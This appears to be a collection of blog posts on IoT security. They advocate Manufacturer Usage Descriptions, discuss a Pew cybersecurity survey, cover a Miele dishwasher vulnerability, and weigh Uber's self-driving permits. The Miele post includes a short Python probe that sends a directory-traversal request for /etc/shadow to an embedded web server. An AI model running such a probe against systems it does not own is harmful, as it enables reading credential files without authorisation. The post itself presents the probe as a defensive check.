Addressing the Department Gap in IoT Security

People in departments outside of IT aren’t paid to understand IT security. In the world of IoT, we need to make it easy for those people to do the right thing.

So, Mr. IT professional, you suffer from your colleagues at work connecting all sorts of crap to your network that you’ve never heard of?  You’re not alone.  As more and more devices hit the network, the ability to maintain control can often prove challenging.  Here are your choices for dealing with miscreant devices:

  1. Prohibit them and enforce the prohibition by firing anyone who attaches an unauthorized device.
  2. Allow them and suffer.
  3. Prohibit them but not enforce the prohibition.
  4. Provide an onboarding and approval process.

A bunch of companies I work with generally aim for 1 and end up with 3.  Plenty of administrators recognize the situation and settle for 2.  Everyone I talk to wants to find a way to scale 4, but nobody has yet.  What does 4 involve?  Today, it means an IT person researching a given device, determining its networking requirements, creating firewall rules and associated policies, and establishing an approval mechanism for the device to connect.

This problem is exacerbated by the fact that different enterprise departments have wide and varied needs, and the network is critical to many of them.  Furthermore, very few of those departments report through the chief information officer, and chief information security officers often struggle to get the attention their concerns deserve.

I would claim that the underlying problem is that incentives are not well aligned, even assuming people in other departments are aware of the IT staff's concerns in the first place, and often they are not.  The person responsible for providing vending machines just wants the vending machines hooked up, while the person in charge of facilities just wants the lights to come on and the temperature to be correct.

What we know from hard experience is that the best way to address this sort of misalignment is to make it easy for everyone to do the right thing. What, then, is the right thing?

Prerequisites

It has been important pretty much forever for enterprises to be able to maintain an inventory of devices that connect to their networks.  This can be tied into the DHCP infrastructure or to the device authentication infrastructure.  Many such systems exist, the simplest of which is Active Directory.  Some are passive and snoop the network.  The key point is simply this: you can’t authorize a system if you can’t remember it.  In order to remember it, the device itself needs to have some sort of unique identifier.  In the simplest case, this is a MAC address.
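
As a concrete illustration, here is a minimal sketch of such an inventory, keyed by MAC address.  It assumes a hypothetical CSV export of DHCP leases (columns mac, ip, hostname); the approved list and file name are made up for the example, and a real deployment would hook into whatever DHCP, NAC, or directory system you already run.

    # Minimal device-inventory sketch: flag anything on the network whose
    # MAC address is not in the approved list.  The CSV format is assumed.
    import csv

    APPROVED = {
        "00:11:22:33:44:55": "conference room thermostat",
        "66:77:88:99:aa:bb": "lobby vending machine",
    }

    def review_leases(lease_csv_path):
        """Print any device seen in the DHCP leases that is not approved."""
        with open(lease_csv_path, newline="") as f:
            for row in csv.DictReader(f):
                mac = row["mac"].lower()
                if mac not in APPROVED:
                    print(f"unapproved device: {mac} ({row['hostname']}) at {row['ip']}")

    review_leases("leases.csv")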

Ask device manufacturers to help

Manufacturers need to make your life easier by providing you a description of the device's communication requirements.  The best way to do this is with Manufacturer Usage Descriptions (MUD).  When MUD is used, your network management system retrieves a recommendation from the manufacturer, and you can then approve, modify, or refuse the policy.  That way, you don't have to go searching all over random websites.
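
To make the workflow concrete, here is a rough sketch of the retrieval step in Python.  It assumes the device has already emitted a MUD URL (via DHCP, LLDP, or its certificate); the URL shown is purely illustrative, and the field names follow my reading of the MUD draft, so treat them as approximations rather than gospel.

    # Fetch the manufacturer's usage description and summarize it for an
    # administrator to approve, modify, or refuse.
    import json
    import urllib.request

    def fetch_mud_file(mud_url):
        """Retrieve and parse the MUD file (a JSON document) from the manufacturer."""
        with urllib.request.urlopen(mud_url) as resp:
            return json.load(resp)

    def summarize_for_approval(mud):
        """Print what the manufacturer says the device needs, for human review."""
        meta = mud.get("ietf-mud:mud", {})
        print("Device:", meta.get("systeminfo", "(no description)"))
        print("Last updated:", meta.get("last-update", "unknown"))
        for direction in ("from-device-policy", "to-device-policy"):
            acls = meta.get(direction, {}).get("access-lists", {}).get("access-list", [])
            print(direction + ":", [entry.get("name") for entry in acls])

    # Hypothetical URL for illustration only.
    summarize_for_approval(fetch_mud_file("https://manufacturer.example/dishwasher.json"))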

Have a simple and accessible user interface for people to use

Once this is in place, you have a system that encourages the right thing to happen, without other departments having to do anything other than identify the devices they want to connect.  That could be as simple as snapping a picture of a QR code or entering a serial number, as in the sketch below.  The easier we can make it for people who know nothing about networking, the better all our lives will be.
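
Here is a trivial sketch of what that "easy button" might look like behind the scenes: a user in another department submits a scanned QR payload, and the device lands in a queue for IT approval.  The payload format (model|serial|mud-url) and the function names are invented for illustration.

    # Onboarding sketch: non-IT staff identify a device; IT approves it later.
    PENDING_APPROVALS = []

    def submit_device(qr_payload, submitted_by):
        """Record a device identified by a scanned QR code for later IT review."""
        model, serial, mud_url = qr_payload.split("|")
        PENDING_APPROVALS.append({
            "model": model,
            "serial": serial,
            "mud_url": mud_url,
            "submitted_by": submitted_by,
        })
        return f"Thanks!  {model} (serial {serial}) has been sent to IT for approval."

    print(submit_device("PG8528|A1234567|https://manufacturer.example/pg8528.json", "facilities"))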

Pew should evolve its cybersecurity survey

Pew should evolve the questions they are asking and the advice they are giving based on how the threat environment is changing. But they should keep asking.

Last year, Pew Research surveyed just over 1,000 people to get a feel for how informed they are about cybersecurity.  That's a great idea, because it tells us as a society how well consumers are able to defend themselves against common attacks.  Let's consider some ways this survey could evolve, and how consumers can mitigate certain common risks.  Keep in mind that Pew conducted the survey in June of last year, in a fast-changing world.

Several of the questions related to phishing, Wi-Fi access points, and VPNs.  VPNs have been in the news recently because of the Trump administration's and Congress' backtracking on privacy protections.  While privacy invasion by service providers is a serious problem, accessing one's bank at an open access point is probably considerably less so.  There are two reasons for this.  First, banks almost all make use of TLS to protect communications.  Attempts to fake bank sites by intercepting communications will, at the very least, produce a warning that browser manufacturers have made increasingly difficult to bypass.  Second, many financial institutions offer apps on mobile devices that take some care to validate that the user is actually talking to their service.  In this way, these apps actually mark a significant reduction in phishing risk.  Yes, the implication is that using a laptop with a web browser is a slightly riskier way to access your bank than the app the bank likely provides, and yes, there's a question hiding there for Pew in its survey.

Another question on the survey refers to password quality.  While that is something of a problem, there are two bigger problems lurking behind it that consumers should understand:

  • Reuse of passwords.  Consumers will often reuse passwords simply because it's hard to remember many of them.  Worse, many password managers themselves have had vulnerabilities.  Why wouldn't attackers go after them?  It's like the apocryphal Willie Sutton quote about robbing banks because that's where the money is.  Still, with numerous break-ins, such as those that occurred with Yahoo! last year*, and others that have surely gone unreported or unnoticed, reuse of passwords is a very dangerous practice.
  • Aggregation of trust in smartphones.  As recent articles about U.S. Customs and Border Protection demanding access to smartphones demonstrate, many services, such as Facebook, Twitter, and email, are reachable by anyone who gains access to the phone.  Worse, because SMS and email are often used to reset passwords, access to the phone itself typically means easy access to most consumer services.

One final area that requires coverage: as the two followers of my blog are keenly aware, IoT presents a whole new class of risk that Pew has yet to address in its survey.

The risks I mention were not well understood as recently as five years ago.  But now they are, and they have been for at least the last several years.  Pew should keep surveying and keep informing everyone, but it should also evolve the questions it asks and the advice it gives.


* Those who show disdain toward Yahoo! may find they themselves live in an enormous glass house.

Yet another IoT bug

Miele could have benefited from MUD, as well as the experience of the Internet security community.

The Register is reporting a new IoT bug involving Miele PG 8528 professional dishwashers, used in hospitals and elsewhere.  In this case, it is a directory traversal vulnerability in an embedded HTTP server listening on port 80.  In all likelihood, the most harm this vulnerability will directly cause is that the dishwasher runs when it shouldn't.  However, the indirect risk is that the device could be used to exfiltrate private information about patients and staff.  The vulnerability is reported here.
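
For the curious, a traversal of this sort is easy to check for on equipment you own: ask the embedded web server for a path that climbs out of its web root and see whether a system file comes back.  The sketch below is illustrative, and the address is a placeholder; it is not a substitute for the published advisory.

    # Probe an embedded HTTP server for directory traversal.  Only run this
    # against equipment you own.  http.client sends the path verbatim,
    # without normalizing the ".." segments away.
    import http.client

    def looks_traversable(host, port=80):
        """Return True if a traversal-style request appears to leak a system file."""
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request("GET", "/../../../../../../etc/shadow")
        resp = conn.getresponse()
        body = resp.read(4096).decode("utf-8", errors="replace")
        conn.close()
        return resp.status == 200 and "root:" in body

    print(looks_traversable("192.0.2.10"))  # replace with the device's address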

Manufacturers expect that it will be very simple to provide Internet services on their devices.  At first, they think it's fine to slap a transceiver and a simple stack on a device and call it done.  It's not.  They need to correct vulnerabilities such as this one, and they apparently have no mechanism to do so.  Manufacturers such as Miele are experts within their own domains, such as building dishwashers.  They are not experts in Internet security.  It is a new world when these two domains intersect.

We need MUD

And yes, Manufacturer Usage Descriptions would have helped here, by restricting communication either to all local devices or to specifically authorized devices.
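
To give a flavor of what that would look like, here is a simplified, illustrative fragment of such a policy expressed as a Python dictionary: the dishwasher may talk to hosts on the local network and nothing else.  The field names are paraphrased from the MUD draft and are not guaranteed to match the YANG model exactly.

    # Illustrative MUD-style policy: permit traffic from the device only to
    # the local network; everything else is implicitly denied.
    import json

    policy = {
        "ietf-mud:mud": {
            "systeminfo": "Miele PG 8528 (example)",
            "from-device-policy": {
                "access-lists": {"access-list": [{"name": "from-dishwasher"}]}
            },
        },
        "ietf-access-control-list:acls": {
            "acl": [{
                "name": "from-dishwasher",
                "aces": {"ace": [{
                    "name": "local-only",
                    "matches": {"ietf-mud:mud": {"local-networks": [None]}},
                    "actions": {"forwarding": "accept"},
                }]},
            }]
        },
    }

    print(json.dumps(policy, indent=2))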

MUD sliding along

Your chance to try and chime in on Manufacturer Usage Descriptions, a way to protect IoT devices.

You may recall that I am working on a mechanism known as Manufacturer Usage Descriptions (MUD).  This is the system by which manufacturers can inform the network about how best to protect their products.  The draft for this work is now about to enter “working group last call” at the IETF.  This means that now would be a very good time for people to chime in with their views on the subject.

In the meantime, MUD Maker has also been coming along. This is a tool that generates manufacturer usage descriptions.  You can find the tool here.

MUD isn’t meant to be the whole enchilada of IoT security.  Other tools are needed to authenticate devices onto the network, and to securely update them.  And manufacturers have to take seriously not only their customers’ needs, but what risk they may impose on others, as Mirai reminded us.  Had MUD been around at the time, it’s possible that Mirai would not have happened.

Should Uber require a permit for testing?

The Wall Street Journal and others are reporting on the ongoing battle between Uber and state and local governments.  This time the fight is over Uber's self-driving cars.  Uber announced last week that it would not bother to seek a permit to test them, claiming that the law did not require one.  The conflict took on a new dimension when one of Uber's test vehicles ran a red light.

Is Uber right in not wanting to seek a permit?  Both production and operation of vehicles are highly regulated in nearly all markets.  That's because auto accidents are a leading cause of death in the United States and elsewhere.  The good news is that the number is falling, partly due to regulation and partly due to civil liability laws.  I'm confident that Uber doesn't want to hurt people, and that its interest is undoubtedly in putting out a safe service so that its reputation doesn't suffer and its business thrives.  But the rush to market is sometimes too alluring.  With the pace of technology being what it is, Uber and others could flood the streets with unsafe vehicles, possibly well beyond their ability to pay out damages.  That's when regulations are required.

There are a few hidden points in all of this:

  • As governments consider what to do about regulating the Internet of Things, they should recognize that much of the Internet of Things is already regulated.  California did the right thing by incrementally extending the California Vehicle Code to cover self-driving vehicles, rather than coming up with sweeping new regulations.  Regulations already exist for many other industries, including trains, planes, automobiles, healthcare, and electrical plants.
  • We do not yet have a full understanding of the risks involved with self-driving cars, and there are probably parts of the vehicle code that will require revision.  The incremental approach has already taught us where the code might need freshening up: self-driving cars seem to be following the law, and yet they are causing problems for some bicyclists.
  • IoT regulation today is based on traditionally regulated markets.  This doesn't take into account the full nature of the Internet, and the externalities people are exposed to as new products rapidly hit the market.  To me, this means we will likely need some form of regulation over time; there is not yet a regulation that would have prevented the Mirai attack.  Rather than fighting all regulation as Uber does, it may be better to articulate the right principles to apply.  One of those is that there has to be a best practice.  In the case of automobiles, the usual test for the roads is whether a feature will make things more or less safe than the status quo.  California's approach is to let developers experiment under limited conditions in order to find out.

None of this gets to my favorite part, which is whether Uber's service can be hacked to cause chaos on the roads.  Should that be tested in advance?  And if so, how?  What are the best practices Uber should be following in this context?  Some exist.

More on this over time.